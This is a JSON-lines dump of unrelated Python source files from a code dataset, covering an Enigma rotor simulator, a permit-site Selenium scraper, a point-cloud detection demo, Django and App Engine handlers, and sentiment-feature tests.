__repr__(self):\n \"\"\"\n returns a string with the 'ROTOR_ID' 'RING CHARACTERS'\n 'WIRING CHARACTERS' and 'TURNOVER CHARACTERS'. The parameters\n are the same as those used to initialize the rotor.\n \"\"\"\n\n rot_str = (f\"ROTOR ID : {self._device_id}\\n\"\n f\"RING CHARACTERS : {self._rotor.ring_characters}\\n\"\n f\"WIRING CHARACTERS : {self._wire_chars}\\n\"\n f\"TURNOVER CHARACTERS : {self._rotor.turnover_characters}\\n\")\n\n rot_str += \"LH_TRANSLATION_TABLE\\n\"\n for position, translation in self._lh_translation_map.items():\n trans_str = \"\"\n for i in translation:\n trans_str += f\"{LETTERS[i]} \"\n rot_str += f\"{str(position).rjust(2, '0')} {trans_str}\\n\"\n\n rot_str += \"RH_TRANSLATION_TABLE\\n\"\n for position, translation in self._rh_translation_map.items():\n trans_str = \"\"\n for i in translation:\n trans_str += f\"{LETTERS[i]} \"\n rot_str += f\"{str(position).rjust(2, '0')} {trans_str}\\n\"\n\n return rot_str\n\n def __str__(self):\n \"\"\"\n returns a string with the 'ROTOR ID' 'ROTOR SETTING'\n 'RING SETTING' 'RING CHARACTERS' 'WIRING CHARACTERS'\n and 'TURNOVER CHARACTERS'. The rotor setting and ring\n setting are the current settings. The rest of the \n parameters are the same as those used to initialize\n the rotor.\n \"\"\"\n def list_to_string(list_):\n return ','.join(['{:<2}'.format(char) for char in list_])\n\n return (f\"ROTOR ID -----------: {self._device_id}\\n\"\n f\"ROTOR SETTING ------: {self._rotor.rotor_setting}\\n\"\n f\"RING SETTING -------: {self._rotor.ring_setting}\\n\"\n f\"RING CHARACTERS ----: {list_to_string(self._rotor.ring_characters)}\\n\"\n f\"WIRING CHARACTERS --: {list_to_string(self.wiring_characters)}\\n\"\n f\"TURNOVER CHARACTERS : {list_to_string(self._rotor.turnover_characters)}\\n\")\n\n @property\n def wiring_characters(self):\n \"\"\"\n\n \"\"\"\n char_map = { LETTERS[i] : self._charset[i] for i in range(26) }\n return [char_map[l] for l in self._wire_chars]\n\n @property\n def rotor_dict(self):\n \"\"\"\n returns a dictionary object with 'ROTOR_TYPE' 'ROTOR_SETTING'\n 'RING_SETTING' 'RING_CHARACTERS' 'ROTOR_CHARACTERS' and\n 'TURNOVER_CHARACTERS'. The ring characters list and rotor characters\n list are shifted to reflect there current values for the current ring\n and rotor settings.\n \"\"\"\n return {\n \"ROTOR_TYPE\": self.device_id,\n \"ROTOR_SETTING\": self._rotor.rotor_setting,\n \"RING_SETTING\": self._rotor.ring_setting,\n \"RING_CHARACTERS\": self._rotor.current_ring_characters(),\n \"WIRING_CHARACTERS\": self.current_wiring_characters(),\n \"TURNOVER_CHARACTERS\": self._rotor.turn_chars\n }\n\n def lh_output(self, index):\n \"\"\"\n\n \"\"\"\n try:\n offset = self._rotor.core_offset()\n return self._lh_translation_map[offset][index]\n except Exception:\n msg = f\"INDEX {index}\"\n raise RotorInputIndexError(msg)\n\n def rh_output(self, index):\n \"\"\"\n\n \"\"\"\n try:\n offset = self._rotor.core_offset()\n return self._rh_translation_map[offset][index]\n except Exception:\n msg = f\"\"\n raise RotorInputIndexError(msg)\n\n def valid_input_index(self, index):\n \"\"\"\n\n \"\"\"\n if index not in range(26):\n raise RotorInputIndexError(index)\n\n def current_wiring_characters(self):\n \"\"\"\n\n \"\"\"\n char_map = { i : self._charset[i] for i in range(26) }\n return [char_map[i] for i in self._lh_translation_map[self._rotor.core_offset]]\n\n @property\n def character_set(self):\n \"\"\"\n\n \"\"\"\n return self._charset\n\n @property\n def character_set_flag(self):\n \"\"\"\n\n \"\"\"\n return self._charset_flag\n\n @character_set_flag.setter\n def character_set_flag(self, flag):\n \"\"\"\n\n \"\"\"\n if flag in [\"L\",\"N\"]:\n self._charset_flag = flag\n self._charset = LETTERS if flag == 'L' else NUMBERS\n else:\n msg = (\n f\"Charset flag error!. {flag} is not a valid charset flag. \"\n f\"Must be 'L' or 'N'\")\n raise ValueError(msg)\n\n def _make_translation_maps(self):\n \"\"\"\n\n \"\"\"\n lh_translation_map = {}\n rh_translation_map = {}\n\n connections = deque(self._wire_chars)\n letters = deque(LETTERS)\n\n for i in range(26):\n lh_translation_arr = [letters.index(l) for l in connections]\n rh_translation_arr = [connections.index(l) for l in letters]\n lh_translation_map[i] = lh_translation_arr\n rh_translation_map[i] = rh_translation_arr\n connections.rotate(-1)\n letters.rotate(-1)\n self._lh_translation_map = lh_translation_map\n self._rh_translation_map = rh_translation_map\n","sub_path":"enigma/core_enigma/scrambler/rotor_core.py","file_name":"rotor_core.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"638253243","text":"import bisect\n\n# From docs.python.org\n\ndef index(a, x):\n 'Locate the leftmost value exactly equal to x'\n i = bisect.bisect_left(a, x)\n if i != len(a) and a[i] == x:\n return i\n raise ValueError('index: Not found!')\n\ndef find_lt_ind(a, x):\n 'Find rightmost value less than x'\n i = bisect.bisect_left(a, x)\n if i:\n return i-1\n raise ValueError('find_lt: Not found!')\n\ndef find_lt(a, x):\n i = find_lt_ind(a, x)\n return a[i]\n\ndef find_le_ind(a, x):\n 'Find rightmost value less than or equal to x'\n i = bisect.bisect_right(a, x)\n if i:\n return i-1\n raise ValueError('find_le: Not found!')\n\ndef find_le(a, x):\n i = find_le_ind(a, x)\n return a[i]\n\ndef find_gt_ind(a, x):\n 'Find leftmost value greater than x'\n i = bisect.bisect_right(a, x)\n if i != len(a):\n return i\n raise ValueError('find_gt: Not found!')\n\ndef find_gt(a, x):\n i = find_gt_ind(a, x)\n return a[i]\n\ndef find_ge_ind(a, x):\n 'Find leftmost item greater than or equal to x'\n i = bisect.bisect_left(a, x)\n if i != len(a):\n return i\n print('a: '+repr(a))\n print('x: '+repr(x))\n raise ValueError('find_ge: Not found!')\n\ndef find_ge(a, x):\n i = find_ge_ind(a, x)\n return a[i]\n","sub_path":"scripts/ldetect_lib/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"96914124","text":"\n\"\"\"THe ScrokkbarFrame Example.\"\"\"\n\nimport wx\n\nclass ScrollbarFrame( wx.Frame ):\n\tdef __init__( self ):\n\t\twx.Frame.__init__( self, None, -1, 'Scrollbar Example', size=(300,200) )\n\t\tself.scroll = wx.ScrolledWindow( self, -1 )\n\t\tself.scroll.SetScrollbars( 1, 1, 600, 1000 )\n\t\tself.button = wx.Button( self.scroll, -1, \"Scroll Me\", pos=(50,20) )\n\t\tself.Bind( wx.EVT_BUTTON, self.OnClickTop, self.button )\n\t\tself.button2 = wx.Button( self.scroll, -1, \"Scroll Bake\", pos=(500,350))\n\t\tself.Bind( wx.EVT_BUTTON, self.OnClickBottom, self.button2 )\n\n\t\tbitmap = wx.Image( '0.jpg', wx.BITMAP_TYPE_JPEG).ConvertToBitmap();\n\t\tself.bmp = wx.StaticBitmap( self.scroll, bitmap=bitmap, pos=(500,400) )\n\n\tdef OnClickTop( self, event ):\n\t\tself.scroll.Scroll( 600, 400 )\n\n\tdef OnClickBottom( self, event ):\n\t\tself.scroll.Scroll( 1, 1)\n\nif __name__ == '__main__':\n\tapp = wx.PySimpleApp()\n\tframe = ScrollbarFrame()\n\tframe.Show()\n\tapp.MainLoop()\n","sub_path":"ScrollbarFrame.py","file_name":"ScrollbarFrame.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"478900646","text":"import views, webapp2, models, time\nfrom helpers.form_validation import Validate as valid\nfrom google.appengine.ext import ndb\n\n\nclass UnFeatureHandler(views.Template):\n\tdef get(self):\n\t\tuser = self.user_check()\n\t\tvid_key = ndb.Key(urlsafe=self.request.get('id'))\n\t\trecord = vid_key.get()\n\t\tif record.acc_key == user.key:\n\t\t\trecord.featured = False\n\t\t\trecord.put()\n\t\t\ttime.sleep(.5)\n\t\t\tself.redirect('/musician_profile')\n\t\telse:\n\t\t\tself.response.out.write('Not Authorized')\n\t\t\n\t\t\n\nclass FeatureHandler(views.Template):\n\tdef get(self):\n\t\tuser = self.user_check()\n\t\tvid_key = ndb.Key(urlsafe=self.request.get('id'))\n\t\trecord = vid_key.get()\n\t\t\n\t\tif record.acc_key == user.key:\n\t\t\tvideos = models.videos.Videos.query_by_account(user.key)\n\t\t\tfor v in videos:\n\t\t\t\tif v.featured == True:\n\t\t\t\t\tv.featured = False\n\t\t\t\t\tv.put()\n\t\t\t\n\t\t\trecord.featured = True\n\t\t\trecord.put()\n\t\t\ttime.sleep(.5)\n\t\t\tself.redirect('/musician_profile')\n\t\telse:\n\t\t\tself.response.out.write('Not Authorized')\n\t\t\n\t\t\n\t\t\n\t\nclass RemoveHandler(views.Template):\n\tdef get(self):\n\t\tuser = self.user_check()\n\t\tvid_key = ndb.Key(urlsafe=self.request.get('id'))\n\t\trecord = vid_key.get()\n\t\n\t\tif record.acc_key == user.key:\n\t\t\tvid_key.delete()\n\t\t\ttime.sleep(.5)\n\t\t\tself.redirect('/musician_profile')\n\t\telse:\n\t\t\tself.response.out.write('Not Authorized')\n\t\nclass AddHandler(views.Template):\n\tdef post(self):\n\t\tsubmission_video = valid.get_video(self.request.get('video_url'))\n\t\tvideo_genre = self.request.get('band_genre')\n\t\tacc_key = self.user_check()\n\t\tmusician = models.musician.Musician.query_by_account(acc_key.key)\n\t\tvideo = models.videos.Videos(embed_link = submission_video['embed_link'],\n\t\t\t\t\t\t\t\t\tacc_key = acc_key.key,\n\t\t\t\t\t\t\t\t\tmusician_key = musician.key,\n\t\t\t\t\t\t\t\t\tgenre_tag = video_genre,\n\t\t\t\t\t\t\t\t\tvideo_title = submission_video['title'],\n\t\t\t\t\t\t\t\t\tfeatured = False).put()\n\t\t\t\t\t\t\t\t\t\n\t\tif video and video_genre not in musician.band_genre:\n\t\t\tmusician.band_genre.append(video_genre)\n\t\t\tmusician.put()\n\t\t\t\n\t\ttime.sleep(.5)\n\t\tself.redirect('/musician_profile')\n\n\t\napp = webapp2.WSGIApplication([\n \n ('/video_unfeature*', UnFeatureHandler),\n\t('/video_feature', FeatureHandler),\n ('/video_remove*', RemoveHandler),\n ('/video_add*', AddHandler)\n\n\n], debug=True)","sub_path":"video_handler.py","file_name":"video_handler.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"618569950","text":"import csv\r\nimport time\r\nimport random\r\nimport selenium\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import Select\r\n\r\nPATH = \"C:\\\\Program Files (x86)\\\\chromedriver.exe\"\r\ndriver = webdriver.Chrome(PATH)\r\n\r\n### Monroe County, Florida\r\nurl = \"https://mcesearch.monroecounty-fl.gov/search/permits/\"\r\n\r\ndriver.get(url)\r\n\r\n# Set dropdown menus and search\r\nstatus = Select(driver.find_element_by_id('status'))\r\nstatus.select_by_visible_text('OPEN')\r\n\r\npermit_type = Select(driver.find_element_by_id('permit_type'))\r\npermit_type.select_by_visible_text('POOL & SPA')\r\n\r\nresults_length = Select(driver.find_element_by_name(\"permits-result_length\"))\r\nresults_length.select_by_visible_text(\"100\")\r\n\r\ntime.sleep(random.randint(2, 10))\r\n\r\n# scrape table\r\n# get rows\r\nrows = len(driver.find_elements_by_xpath(\"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/tbody/tr\"))\r\nprint(\"Rows: \" + str(rows))\r\n\r\n# get columns\r\ncols = len(driver.find_elements_by_xpath(\"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/tbody/tr[1]/td\"))\r\nprint(\"Columns: \" + str(cols))\r\n\r\n# scrape table header\r\nheader_list = []\r\nfor c in range(1, cols + 1):\r\n header = driver.find_element_by_xpath(\r\n \"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/thead/tr[1]/th[\"+str(c)+\"]\").text\r\n header_list.append(header)\r\n\r\n# scrape table body and click next until last page, sleep after each one\r\n\r\nvalue = \"\"\r\nvalues_list = []\r\n\r\n# scrape first page\r\nfor r in range(1, rows + 1):\r\n for c in range(1, cols + 1):\r\n value = driver.find_element_by_xpath(\r\n \"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/tbody/tr[\"+str(r)+\"]/td[\"+str(c)+\"]\").text\r\n values_list.append(value)\r\n\r\n# get next button\r\nnext_button_link = driver.find_element_by_link_text(\"Next\") # actually click this\r\nnext_button = driver.find_element_by_id(\"permits-result_next\") # use only to see if disabled\r\nnext_enabled = \"disabled\" not in next_button.get_attribute(\"class\")\r\n\r\nwhile(next_enabled):\r\n next_button_link.click()\r\n time.sleep(random.randint(2, 10))\r\n next_button_link = driver.find_element_by_link_text(\"Next\")\r\n next_button = driver.find_element_by_id(\"permits-result_next\") \r\n next_enabled = \"disabled\" not in next_button.get_attribute(\"class\")\r\n if(not next_enabled):\r\n # recalculate rows\r\n rows = len(driver.find_elements_by_xpath(\"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/tbody/tr\"))\r\n print(\"Rows on Last Page: \" + str(rows))\r\n\r\n #scrape table page\r\n for r in range(1, rows + 1):\r\n for c in range(1, cols + 1):\r\n value = driver.find_element_by_xpath(\r\n \"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/tbody/tr[\"+str(r)+\"]/td[\"+str(c)+\"]\").text\r\n values_list.append(value)\r\n\r\nprint(\"Header Length: \" + str(len(header_list)))\r\nprint(header_list)\r\nvalues_length = len(values_list)\r\nprint(\"Values Length: \" + str(values_length))\r\n\r\n# write to csv\r\nwith open('pool_permits_Monroe_FL.csv', mode='w', newline = '') as pool_file:\r\n pool_writer = csv.writer(pool_file, delimiter=',', quotechar='\"')\r\n\r\n pool_writer.writerow(header_list)\r\n for i in range(0, values_length, cols):\r\n pool_writer.writerow(values_list[i:i+cols])\r\n\r\ndriver.quit()\r\n\r\n### Maricopa County, Arizona\r\n# Do we want both residential and commercial?\r\n# Not possible to search by status, but shows in results. Issued, Reissued, Final\r\n# Application or Issue date is given, Expiration date looks sparse\r\n# no download button\r\n\r\n### Kern County, California\r\n# Advanced Search -> Search for Records -> Building\r\n# Status: Issued, Finaled, Reviewed\r\n# One date given\r\n# has a download button for csv\r\n\r\n### San Mateo County, California\r\n# Can't search for record type?\r\n# Has a download button for csv\r\n\r\n### Martin County, Florida\r\n# Has permit types for pool deck, pool barrier, pool enclosure\r\n# Has downloadable csv\r\n\r\n### Charlotte County, Florida\r\n# Can't search status\r\n# has downloadable csv\r\n\r\n### City of Atlanta, Georgia\r\n# downloadable results\r\n\r\n### Clark County, Nevada\r\n# no downloadable results\r\n\r\n### Wake County, North Carolina\r\n# Do we want both commercial and residential?\r\n# Can search status. What permit statuses do we want? Approved, Complete, Issued, Submitted?\r\n# slow load time\r\n# no dowloadable results\r\n\r\n# Must only scrape 3 more websites, can use csv for others\r\n","sub_path":"Pool Permit Web Scraping.py","file_name":"Pool Permit Web Scraping.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"279034788","text":"import argparse\nimport glob\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nimport torch\nimport json\nfrom tqdm import tqdm as tqdm\nimport pandas as pd\n\nfrom pcdet.config import cfg, cfg_from_yaml_file\nfrom pcdet.datasets import DatasetTemplate\nfrom pcdet.models import build_network, load_data_to_gpu\nfrom pcdet.utils import common_utils\n\ndef create_dirs_if_not_exists(directories):\n if type(directories)==str:\n directories=[directories]\n\n for d in directories:\n if not os.path.isdir(d):\n os.makedirs(d)\n\n\ndef convert_to_numpy(x):\n if not isinstance(x, np.ndarray):\n x = x.cpu().numpy()\n return x\n\ndef get_all_files_in_tree(folderPath, extensions = ['jpg','png'], getCompletePaths=True):\n img_names = []\n for ext in extensions:\n img_names += glob.glob(\"{}/**/*.{}\".format(folderPath, ext), recursive=True)\n if not getCompletePaths:\n img_names = [os.path.basename(i) for i in img_names]\n return img_names\n\nclass DemoDataset(DatasetTemplate):\n def __init__(self, dataset_cfg, class_names, training=True, root_path=None, logger=None, ext='.bin'):\n \"\"\"\n Args:\n root_path:\n dataset_cfg:\n class_names:\n training:\n logger:\n \"\"\"\n super().__init__(\n dataset_cfg=dataset_cfg, class_names=class_names, training=training, root_path=root_path, logger=logger\n )\n self.root_path = root_path\n self.ext = ext\n is_dir = os.path.isdir(self.root_path)\n data_file_list = get_all_files_in_tree(\n self.root_path,\n getCompletePaths=True,\n extensions=[self.ext.lstrip(\".\")]\n ) if is_dir else [self.root_path]\n data_file_list.sort()\n self.sample_file_list = data_file_list\n\n\n def __len__(self):\n return len(self.sample_file_list)\n\n def __getitem__(self, index):\n if self.ext == '.bin':\n points = np.fromfile(self.sample_file_list[index], dtype=np.float32).reshape(-1, 4)\n elif self.ext == '.npy':\n points = np.load(self.sample_file_list[index])\n elif self.ext == '.csv':\n df = pd.read_csv(self.sample_file_list[index])\n points = np.array(df[['X', 'Y', 'Z', 'intensity']], dtype=np.float32)\n points[:, 3] = points[:, 3] / 255.0\n\n # print(\"===========points fresh=================\")\n #\n # print(points.shape)\n # print(np.min(points, axis=0))\n # print(np.max(points, axis=0))\n # print(points[np.random.randint(low=0, high=len(points), size=10)])\n # print(\"===========points fresh=================\")\n else:\n raise NotImplementedError\n\n input_dict = {\n 'points': points,\n 'frame_id': index,\n }\n\n data_dict = self.prepare_data(data_dict=input_dict)\n\n return data_dict, self.sample_file_list[index]\n\n\ndef parse_config():\n parser = argparse.ArgumentParser(description='arg parser')\n parser.add_argument('--cfg_file', type=str, default='cfgs/kitti_models/second.yaml',\n help='specify the config for demo')\n parser.add_argument('--data_path', type=str, default='demo_data',\n help='specify the point cloud data file or directory')\n parser.add_argument('--ckpt', type=str, default=None, help='specify the pretrained model')\n parser.add_argument('--ext', type=str, default='.bin', help='specify the extension of your point cloud data file')\n parser.add_argument('--visualize', action='store_true', help='whether to visualize')\n parser.add_argument('--output_dir', default=\"predictions_dir\", help='whether to visualize')\n\n\n args = parser.parse_args()\n\n cfg_from_yaml_file(args.cfg_file, cfg)\n\n return args, cfg\n\n\ndef main():\n args, cfg = parse_config()\n logger = common_utils.create_logger()\n if args.visualize:\n import mayavi.mlab as mlab\n from visual_utils import visualize_utils as V\n else:\n from visual_utils.conv_utils import boxes_to_corners_3d\n\n logger.info('-----------------Quick Demo of OpenPCDet-------------------------')\n demo_dataset = DemoDataset(\n dataset_cfg=cfg.DATA_CONFIG, class_names=cfg.CLASS_NAMES, training=False,\n root_path=Path(args.data_path), ext=args.ext, logger=logger\n )\n logger.info(f'Total number of samples: \\t{len(demo_dataset)}')\n\n model = build_network(model_cfg=cfg.MODEL, num_class=len(cfg.CLASS_NAMES), dataset=demo_dataset)\n model.load_params_from_file(filename=args.ckpt, logger=logger, to_cpu=True)\n model.cuda()\n model.eval()\n with torch.no_grad():\n for idx, (data_dict, filepath) in tqdm(enumerate(demo_dataset)):\n #logger.info(f'Visualized sample index: \\t{idx + 1}')\n data_dict = demo_dataset.collate_batch([data_dict])\n load_data_to_gpu(data_dict)\n pred_dicts, _ = model.forward(data_dict)\n\n if args.visualize:\n\n V.draw_scenes(\n points=data_dict['points'][:, 1:], ref_boxes=pred_dicts[0]['pred_boxes'],\n ref_scores=pred_dicts[0]['pred_scores'], ref_labels=pred_dicts[0]['pred_labels']\n )\n mlab.show(stop=True)\n else:\n create_dirs_if_not_exists([args.output_dir])\n #print (\"data path \", args.data_path)\n output_file = os.path.join(args.output_dir,os.path.splitext(os.path.basename(filepath))[0])\n output_file = output_file+\".npy\"\n predictions = pred_dicts[0]\n predictions['pred_boxes'] = convert_to_numpy(boxes_to_corners_3d(predictions['pred_boxes']))\n predictions['pred_scores'] = convert_to_numpy(predictions['pred_scores'])\n predictions['pred_labels'] = convert_to_numpy(predictions['pred_labels'])\n np.save(output_file, predictions)\n\n logger.info('Demo done.')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"176284373","text":"\n# coding: utf-8\n\n# In[75]:\n\n\nimport pandas as pd\nimport numpy as np\nimport datetime\nfrom ast import literal_eval\nimport Utilities.DataTransforms as UtilitiesDataTransforms\n\n# In[111]:\n\n\nclass IMDBMetaData:\n\n def __init__(self):\n self.location_raw = \"../data/movies_metadata.csv\"\n self.location_clean = \"../data/movies_metadata_clean.csv\"\n self.current_time = datetime.datetime.now()\n pass\n \n\n def get_raw(self):\n raw = pd.read_csv(self.location_raw)\n return raw\n \n\n def clean_raw(self, min_run, max_run):\n raw = self.get_raw()\n #filtering by select variables\n keep_vars = ['id','title', 'release_date', \n 'budget', 'revenue', \n 'runtime', 'genres', \n 'vote_count', 'vote_average', 'overview'\n ]\n narrow = raw[keep_vars]\n \n #Converting datatypes\n narrow['budget'] = narrow['budget'].apply(UtilitiesDataTransforms.to_float)\n narrow['id'] = narrow['id'].apply(UtilitiesDataTransforms.to_float)\n \n narrow = narrow[narrow['id'].notnull()]\n #convert release_date into into pandas dataframe\n narrow['release_date'] = pd.to_datetime(narrow['release_date'], errors='coerce')\n #extract year from the datetime\n narrow['year'] = narrow['release_date'].apply(lambda x: str(x).split('-')[0] if x != np.nan else np.nan)\n narrow = narrow[(narrow['runtime'] >= min_run) & (narrow['runtime'] <= max_run)]\n #keeping only the top 3 genres\n features = ['genres']\n for feature in features:\n narrow[feature] = narrow[feature].apply(literal_eval)\n\n narrow['genres'] = narrow['genres'].apply(lambda x: x[:3])\n\n return narrow\n \n\n def save_clean(self):\n df = self.clean_raw(min_run=45, max_run=300)\n df['saved_on'] = self.current_time\n df = df.to_csv(self.location_clean, index=False)\n print(\"INFO: saved to {0}\".format(self.location_clean))\n return None\n \n\n def get_clean(self):\n df = pd.read_csv(self.location_clean)\n return df\n \n\n def summarize(self, dataset):\n summary_dict = {}\n if dataset == 'raw':\n df = self.get_raw()\n elif dataset == 'clean':\n df = self.get_clean()\n summary_dict['describe'] = df.describe()\n return summary_dict\n\n\n# In[116]:\n\n\ndef main():\n main_dict = {}\n main_dict['raw_data'] = IMDBMetaData().get_raw()\n main_dict['raw_summary'] = IMDBMetaData().summarize(dataset='raw')\n main_dict['clean_summary'] = IMDBMetaData().summarize(dataset='clean')\n main_dict['clean_data'] = IMDBMetaData().get_clean()\n print(\"INFO: dictionary returned with the following datasets\")\n print(main_dict.keys())\n \n return main_dict\n\n\n# In[118]:\n\nif __name__ == '__main__':\n IMDBMetaData().save_clean()\n print(IMDBMetaData().get_clean().genres[0])\n\n\n\n\n\n\n\n\n","sub_path":"main/IMDBMetaData.py","file_name":"IMDBMetaData.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"293489304","text":"\"\"\"task_tracker URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom rest_framework import routers\nfrom django.conf.urls import url, include\nfrom task_tracker.views import UserViewSet, GroupViewSet, TaskList, TaskDetail, CommentList, CommentDetail\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\n\nuser_router = routers.DefaultRouter()\nuser_router.register(r'users', UserViewSet)\nuser_router.register(r'groups', GroupViewSet)\n\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n url(r'^api/', include(user_router.urls)),\n]\n\nurlpatterns += format_suffix_patterns([\n url(r'^api/task/$', TaskList.as_view(), name='tasks'),\n url(r'^api/task/(?P[0-9]+)/$', TaskDetail.as_view(), name='task-detail'),\n url(r'^api/comment/$', CommentList.as_view(), name='comments'),\n url(r'^api/comment/(?P[0-9]+)/$', CommentDetail.as_view(), name='comment-detail'),\n])\n","sub_path":"task_tracker/task_tracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"271477397","text":"import os.path as osp\nimport logging\nimport time\nimport argparse\nfrom collections import OrderedDict\n\nimport options.options as option\nimport utils.util as util\nfrom data import create_dataset, create_dataloader\nfrom models import create_model\n\ndef main():\n #### options\n parser = argparse.ArgumentParser()\n parser.add_argument('-opt', type=str, required=True, help='Path to options YMAL file.')\n opt = option.parse(parser.parse_args().opt, is_train=False)\n opt = option.dict_to_nonedict(opt)\n\n util.mkdirs(\n (path for key, path in opt['path'].items()\n if not key == 'experiments_root' and 'pretrain_model' not in key and 'resume' not in key))\n util.setup_logger('base', opt['path']['log'], 'test_' + opt['name'], level=logging.INFO,\n screen=True, tofile=True)\n logger = logging.getLogger('base')\n logger.info(option.dict2str(opt))\n\n #### Create test dataset and dataloader\n test_loaders = []\n for phase, dataset_opt in sorted(opt['datasets'].items()):\n test_set = create_dataset(dataset_opt)\n test_loader = create_dataloader(test_set, dataset_opt)\n logger.info('Number of test audio files in [{:s}]: {:d}'.format(dataset_opt['name'], len(test_set)))\n test_loaders.append(test_loader)\n\n model = create_model(opt)\n for test_loader in test_loaders:\n test_set_name = test_loader.dataset.opt['name']\n logger.info('\\nTesting [{:s}]...'.format(test_set_name))\n test_start_time = time.time()\n dataset_dir = osp.join(opt['path']['results_root'], test_set_name)\n util.mkdir(dataset_dir)\n\n test_results = OrderedDict()\n test_results['psnr'] = []\n test_results['psnr_y'] = []\n\n for data in test_loader:\n need_GT = False if test_loader.dataset.opt['dataroot_GT'] is None else True\n model.feed_data(data, need_GT=need_GT)\n audio_path = data['GT_path'][0] if need_GT else data['LQ_path'][0]\n audio_name = osp.splitext(osp.basename(audio_path))[0]\n\n model.test()\n audio_samples = model.get_current_audio_samples(need_GT=need_GT)\n\n sr_audio = audio_samples['SR']\n\n suffix = opt['suffix']\n if suffix:\n save_audio_path = osp.join(dataset_dir, audio_name + suffix + '.wav')\n else:\n save_audio_path = osp.join(dataset_dir, audio_name + '.wav')\n util.save_audio(sr_audio, save_audio_path)\n logger.info(audio_name)\n\nif __name__ == '__main__':\n main()\n","sub_path":"codes/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"183034369","text":"import unittest\nimport sentiment_feature_extraction as sfe\nimport sentiment_feature_extraction_spa as sfespa\n\nclass FeatureExtractionTest(unittest.TestCase):\n\n def find_ngrams_test(self):\n words = [\"hello\",\"world\",\"nice\",\"day\"]\n bigrams=[('hello', 'world'), ('world', 'nice'), ('nice', 'day')]\n trigrams=[('hello', 'world', 'nice'), ('world', 'nice', 'day')]\n self.assertEqual(sfe.find_ngrams(words,2), bigrams)\n self.assertEqual(sfe.find_ngrams(words,3), trigrams)\n\n def identify_negations_on_unigrams_test(self):\n\n sentences = [[\"I\",\"like\",\"the\",\"sun\",\"but\",\"i\",\"dont\",\"like\",\"the\",\"rain\"],\n [\"I\",\"have\",\"no\",\"idea\",\"of\",\"the\",\"solution\"],\n [\"No\",\"quiero\",\"ir\",\"al\",\"cine\",\",\",\"pero\",\"si\",\"al\",\"teatro\"]]\n bag_of_words = [\"idea\",\"solution\",\"like\",\"sun\",\"rain\",\"quiero\",\"cine\",\"teatro\"]\n negations = [\"no\",\"dont\"]\n stopwords = [\"I\",\"of\",\"the\",\"al\"]\n features = [{'has_NEG_rain': True, 'has_like': True, 'has_sun': True, 'has_NEG_like': True},\n {'has_NEG_idea': True, 'has_NEG_solution': True},\n {'has_cine': True, 'has_teatro': True, 'has_quiero': True}]\n for i in range(len(sentences)):\n self.assertEqual(sfe.identify_negations_on_unigrams(sentences[i],bag_of_words,stopwords,negations),features[i])\n\n def exclamation_and_interrogation_test(self):\n sentences = [\"I have no idea!!!!\",\"What is your question?\",\"Estoy nerviso!! o no?\"]\n features = [{'!': 4, 'end_with_!': True, '?': 0},\n {'!': 0, 'end_with_?': True, '?': 1},\n {'!': 2, 'end_with_?': True, '?': 1}]\n for i in range(len(sentences)):\n self.assertEqual(sfe.exclamation_and_interrogation(sentences[i]),features[i])\n\n def emoticons_from_dictionary_test(self):\n sentences = [\"No te puedo ayudar :(\", \"I hope you enjoy your time in Madrid :) :)\",\":( :)\"]\n dict_emoticons = {\":)\":1,\":(\":-1}\n features = [{'number_emoticons': 1, 'score_emoticons': -1, 'end_with_negative_emoticon': True, 'score_:(': -1},\n {'number_emoticons': 2, 'score_emoticons': 2, 'score_:)': 1, 'ends_with_positive_emoticon': True},\n {'ends_with_positive_emoticon': True, 'number_emoticons': 2, 'score_emoticons': 0, 'score_:)': 1, 'score_:(': -1}]\n for i in range(len(sentences)):\n self.assertEqual(sfe.emoticons_from_dictionary(sentences[i],dict_emoticons),features[i])\n\n def elongated_words_test(self):\n sentences = [\"Largooo de aquiii\",\"I am tireddddd\"]\n results= [2,1]\n for i in range(len(sentences)):\n self.assertEqual(sfe.elonganted_words(sentences[i]),results[i])\n\n def caps_words_test(self):\n sentences = [\"i DONT like YOU\",\"Estoy ENFADADO\",\"I love the SUN\"]\n 